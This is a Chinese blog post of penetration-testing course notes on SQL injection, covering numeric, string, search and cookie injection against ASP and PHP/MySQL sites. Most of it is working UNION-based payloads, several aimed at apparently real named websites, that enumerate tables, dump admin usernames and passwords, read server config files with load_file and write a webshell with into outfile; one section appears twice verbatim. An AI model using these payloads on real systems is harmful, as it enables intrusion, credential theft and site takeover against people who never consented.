美文网首页
渗透测试安全笔记

渗透测试安全笔记

作者: 孤君蓑笠翁 | 来源:发表于2022-09-20 13:13 被阅读0次

渗透测试安全培训

第一节

搭建环境介绍

   脚本语言介绍

   asp php jsp aspx 环境介绍

  服务器设置情况

  数据库类型介绍

编程语言:c/c++,java,delphi,object-c,net,c#。。。

脚本语言:asp php jsp aspx python cgi perl war javascript ...

asp php jsp aspx 环境介绍:

脚本程序+服务器操作系统+数据库=web环境

操作系统:5.0(win98)iis6.0(2003) 7.X(win7,win2008)

apache(linux win)

tomcat uginx(linux)

asp + access + iis 

asp + sqlserver +iis

php + mysql + apache tomcat uginx

jsp + sqlserver + tomcat

jsp + oracle + tomcat

aspx + sqlserver + iis

获取这个网站的搭建环境?

www.xx.com/sss.asp?id=1

利用工具:站长之家、wwwscan、 破壳 、awvs等 查询

服务器设置情况:入侵遇上的情况说明

入侵网站,无法新建文件,文件夹等,操作权限很小。

数据库:

access sqlserver(mssql) mysql oracle db2 .....

第二节

课程内容

网站后门格式剖析

初识sql注入漏洞原理

了解各个数据库下的注入

网站后门格式剖析:

asp?id=1 输入sql语句注入

asp   php   aspx   jsp    do    html    shtml cgi

伪静态的问题(动转静)

asp 肯定是支持asp格式 asp格式木马可以成功执行

          大小马           一句话木马

          图片格式 jpg gif png 文本txt 压缩包 zip rar。。。

怎么判断后门执行成功 一般成功就不会现实代码。

初识sql注入漏洞原理:

网站没有对输入的字符进行过滤,导致输入的字符影响到网站数据的查询。

编程 数学逻辑思维 and or xor 且 或 否

或:有一个真就是真

且:有一个假就为假

否:相反

http://www.zhjzg.com/ship.asp?id=4 and 1=1 正确 and 1=2 错误

and exists (select [pwd] from [admin]) sql语句

admin下一般包括

username

password

第三节

课程内容

    初识web安全之注入漏洞

    分析sql注入流程

    工具注入和手工注入

安装iis或者下载asp搭建环境(小旋风软件)

怎么找是否有注入漏洞?

第一个找符合参数链接的网站

第二个判断是否存在注入

第三个实施注入攻击

http://127.0.0.1:81/0/Production/PRODUCT_DETAIL.asp?id=1513

and 1=1 and 1=X 发现有注入

分析sql注入流程:

第一步 猜解表名

第二步 猜解列名

第三步 猜解内容

order by XX 判断有多少字段

union select 1,2,3,4,5,6... from admin

22 对的没有报错              23 错      也就是 22个字段

http://127.0.0.1:81/0/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

第四节

课程内容:

三大web提交方式

提交方式下的注入

了解cookie注入

三大web提交方式:GET POST COOKIE

GET /1/shownews.asp?id=27 and 1=1 HTTP/1.1

Host: 127.0.0.1:81

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Proxy-Connection: keep-alive

Cookie: SUNBLSDFBEXADEXXIDYL=DWINSGJSLWMDDQTWHISLFMSRRMWPPYNJUTFLMTEP; dmwh_user_ip=127.0.0.1

get:直接在浏览器上面访问地址

post:按钮事件(会员注册,文件上传等)

cookie:访问网站下面自带的身份验证的值

页面提示内容      请不要在参数中出现:and update delete ; insert mid master 等非法字符!

普通的注入就没办法了,可以尝试大小写,编码等绕过,但是过滤严谨,无法绕过!

代码审计:get 请求进行了过滤

<!--#Include File="inc/Check_Sql.asp"-->     检查特殊字符

<!--#include file="inc/conn.asp"-->

<!--#include file="inc/Skin_css.asp"-->

<!-- #include file="inc/config.asp" -->

<!-- #include file="Head.asp" -->

<!--#include file="inc/Function.asp"-->

了解cookie注入:注入中转工具,工具注入(sqlmap,穿山甲等),手工cookie注入

课程内容:第五讲

各大参数类型详解

各大类型下的注入

分析具体注入原理

各大参数类型详解:字符型,数字型,搜索型

字符型:例如:abcd。。。。。26个英文字母  中文

数字型:0-9

搜索型:搜索关键字

编程中对于字符型的数据是什么表示的?

0123456789 "a" 'b'  a 变量 常量

各大类型下的注入:前面我们的注入基本都是数字型,前面注入语句都是基于数字型注入

字符型注入:

http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包

http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+'1'='1 返回正常。

http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+'1'='2 返回错误。

搜索型注入:搜索框里面存在

http://www.myhack58.com/product/list_search.aspx?search=Donic

http://www.myhack58.com/product/list_search.aspx?search=Donic%'and user>0 and '%'=' //得到当前数据库账号

http://www.myhack58.com/product/list_search.aspx?search=Donic%'and db_name()>0 and '%'=' //得到当前数据库名

http://www.myhack58.com/product/list_search.aspx?search=Donic%'and (select count(*) from admin)>0 and '%'=' //返回错误页面,看来是没有admin这个表了

代码审计:南方数据0day 分析

http://www.xxx.com/NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='

http://www.chinafxhb.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

select  * from News where BigClassName='"& BigClass &"' and  SmallClassName='"‘union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 "' order by AddDate desc

第六讲(上)

SQL命令渗透篇

php+mysql注入

php+mysql注入入侵思路

需要注意的地方

SQL命令渗透篇

mysql.exe -u用户名 -p密码 -hip地址

show databases 查看数据库

select version()。。。。php注入下的查询版本

select * from 表名 查询表名下的列名use database 用到这张表

insert 插入 update 更新

select '数据'

into outfile '路径' (导出数据到路径)

select load_file(hex)  查看路径hex编码内容

注入点:http://www.5hchina.com/news_view.php?id=7406

order by 22

http://www.5hchina.com/news_view.php?id=-7406  UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

http://www.5hchina.com/news_view.php?id=-7406  UNION SELECT 1,2,version(),4,5,user(),7,8,@@version_compile_os,10,11,12,13,14,15,16,17,18,19,20,21,22--

http://www.5hchina.com/news_view.php?id=-7405 UNION SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=0x35686368696E61

5hchina:

admuser,admuser2,adn_anuncios,adn_foros,adn_foros_nuevos,adn_malas_palabras,adn_mensajes,adn_mensajes_nuevos,adn_paginas,adn_usuarios,answer,attach,book,case_history,classes,classes2,click,docs,export,getwell,lyb,lyb2,member,news,pinglun,proclasses,production,soft,temp_tab,udf_temp,vote,vote_save,zhidao

admuser:

id,username,password

http://www.5hchina.com/news_view.php?id=-7405 UNION SELECT 1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.columns where table_name=0x61646D75736572

5hchina:

admuser:

username password

http://www.5hchina.com/news_view.php?id=-7405 UNION SELECT 1,2,username,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admuser

http://www.5hchina.com/news_view.php?id=-7405 UNION SELECT 1,2,username,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admuser

version()版本 5.0.27-community-nt

database()数据库名 5hchina

user()当前用户 root

@@version_compile_os 操作系统 win32

注意地方:该编码的编码

课程内容:第七讲(下)

1 SQL命令渗透篇

2 php+mysql注入

3 php+mysql注入入侵思路

需要注意的地方

SQL命令渗透篇

mysql.exe -u用户名 -p密码 -hip地址

show databases 查看数据库

select version()。。。。php注入下的查询版本

select * from 表名 查询表名下的列名use database 用到这张表

insert 插入 update 更新

select '数据'

into outfile '路径' (导出数据到路径)

select load_file(hex)  查看路径hex编码内容

注入点:http://www.5hchina.com/news_view.php?id=7406

order by 22

http://www.5hchina.com/news_view.php?id=-7406  UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

http://www.5hchina.com/news_view.php?id=-7406  UNION SELECT 1,2,version(),4,5,user(),7,8,@@version_compile_os,10,11,12,13,14,15,16,17,18,19,20,21,22--

http://www.5hchina.com/news_view.php?id=-7405 UNION SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=0x35686368696E61

5hchina:

admuser,admuser2,adn_anuncios,adn_foros,adn_foros_nuevos,adn_malas_palabras,adn_mensajes,adn_mensajes_nuevos,adn_paginas,adn_usuarios,answer,attach,book,case_history,classes,classes2,click,docs,export,getwell,lyb,lyb2,member,news,pinglun,proclasses,production,soft,temp_tab,udf_temp,vote,vote_save,zhidao

admuser:

id,username,password

http://www.5hchina.com/news_view.php?id=-7405 UNION SELECT 1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.columns where table_name=0x61646D75736572

5hchina:

admuser:

  username password

http://www.5hchina.com/news_view.php?id=-7405 UNION SELECT 1,2,username,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admuser

http://www.5hchina.com/news_view.php?id=-7405 UNION SELECT 1,2,username,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admuser

version()版本 5.0.27-community-nt

database()数据库名 5hchina

user()当前用户 root

@@version_compile_os 操作系统 win32

注意地方:该编码的编码

权限下的注入入侵:root权限或者高权限

1.查看文件获取相关信息 (load_file)

2.导入导出一句话拿shell (into outfile)

注意地方(获取到网站根路径)

怎么获取到网站根路径?

谷歌黑客site:5hchina.com warning

文件报错

查看敏感文件info.php   phpinfo.php     test.php

1编码选择hex编码

2如果不编码用''符号表示(hex和’’选择其一就好)

符号的反正型“/”和“\”

D:\web\5hchina.com\根网站路径

root权限:

1.查看文件获取相关信息

http://www.5hchina.com/news_view.php?id=-7405 UNION SELECT 1,2,load_file('D:/web/5hchina.com/index.php'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22

conn.php common.php config.php

0x443A2F7765622F35686368696E612E636F6D2F636F6E6E2E706870

2.导入导出一句话拿shell (into outfile)

http://www.5hchina.com/news_view.php?id=-7405 UNION SELECT 1,2,'aaaa',4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 into outfile 'D:/web/5hchina.com/manage/upload/img/2.php'

http://www.5hchina.com/news_view.php?id=-7405 UNION SELECT 1,2,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from mysql.user

相关文章

  • 渗透测试安全笔记

    渗透测试安全培训 第一节 搭建环境介绍 脚本语言介绍 asp php jsp aspx 环境介绍 服务器设置...

  • 渗透测试步骤

    渗透测试步骤:渗透测试与入侵的最大区别 渗透测试:出于保护系统的目的,更全面地找出测试对象的安全隐患。 入侵:不择...

  • 2020-07-29

    安全渗透测试-sql注入 总目标: 1、sql注入介绍 2、web安全渗透测试分类 3、sql注入原理 4、sql...

  • 二、渗透测试基本流程

    菜鸟学习笔记,请多多指教! 渗透测试流程 2.1 渗透测试基本流程   渗透测试的基本流程主要分为以下几步:  1...

  • #我的笔记#web渗透

    The first day,fighting. Web渗透测试: 渗透测试是对系统安全性的测试,通过模拟恶意黑客的...

  • 我的书单

    信息安全 黑客攻防技术宝典WEB篇 白帽子讲WEB安全(纪念版) 黑客秘籍:渗透测试实用指南 黑客秘笈 渗透测试实...

  • 安全运维工程师成长手册

    安全运维核心技能点-渗透测试与漏洞挖掘 渗透测试与漏洞挖掘:依据攻防思维来构建企业安全体系,是安全建设中不可或缺的...

  • 渗透测试学习(1)测试导论

    渗透测试学习(1)测试导论 渗透测试:采用真实的攻击技术探寻被测单位的安全隐患,继而评估他们的潜在风险。 测试we...

  • web安全基础一

    ----渗透测试:侧重于点 ----安全测试:侧重于安全威胁的建模 -----OWASP 开放式web应用程序安全...

  • 信安人都在看!人人都想考的渗透测试专家级资质,你适合吗?

    在安全界,无论你是高校学生、还是高级网络安全渗透测试人才,亦或是安全相关从业者或爱好者,对国家级渗透测试专业资质认...

网友评论

      本文标题:渗透测试安全笔记

      本文链接:https://www.haomeiwen.com/subject/dcvgiqtx.html